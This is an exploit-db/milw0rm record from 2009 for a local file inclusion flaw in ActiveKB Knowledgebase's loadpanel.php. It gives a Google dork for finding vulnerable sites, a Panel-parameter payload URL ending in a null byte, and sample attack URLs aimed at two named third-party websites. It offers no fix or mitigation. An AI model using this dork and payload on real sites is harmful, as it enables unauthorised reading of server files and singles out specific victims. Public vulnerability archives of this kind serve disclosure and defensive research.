ActiveKB Knowledgebase loadpanel.php Panel Local File Inclusion Vuln

2009-04-03T00:00:00
ID EDB-ID:8346
Type exploitdb
Reporter Angela Chang
Modified 2009-04-03T00:00:00

Description

ActiveKB Knowledgebase (loadpanel.php Panel) Local File Inclusion Vuln. CVE-2009-4957. Webapps exploit for php platform

                                        
                                            [o]------------------------------------------------------------------------------------[x]
 |  Local File Inclusion Vulnerability                                                  |
[o]------------------------------------------------------------------------------------[o]
 |  Software : ActiveKB Knowledgebase version X.X                                       |
 |  Vendor    : http://www.interspire.com/activekb/                                     |
 |  Date         : 02 April 2009                                                        |
 |  Author     : Angela Chang                                                           |
 |  Contact   :  mizz_4ng3l@yahoo.com                                                   |
[o]------------------------------------------------------------------------------------[o]

[»] Google Dork

    "Powered by ActiveKB Knowledgebase Software"
    inurl:loadpanel.php?Panel=

[»] Vulnerable

    ./loadpanel.php

[»] Exploit

    http://[site]/[path]/loadpanel.php?Panel=[LFI]%00

[»] Sample

    http://help.theedweb.com/activekb/loadpanel.php?Panel=[LFI]%00
    http://my.myriadnetwork.com/kb//loadpanel.php?Panel=[LFI]%00

[o]------------------------------------------------------------------------------------[x]
 |  Greetz     :    Speciale Thanks FoR :                                               |
[o]------------------------------------------------------------------------------------[o]
 |    -------- Vrs-hCk , Nyubi (Solpot) , OoN_Boy      ----------                       |
[o]------------------------------------------------------------------------------------[o]

# milw0rm.com [2009-04-03]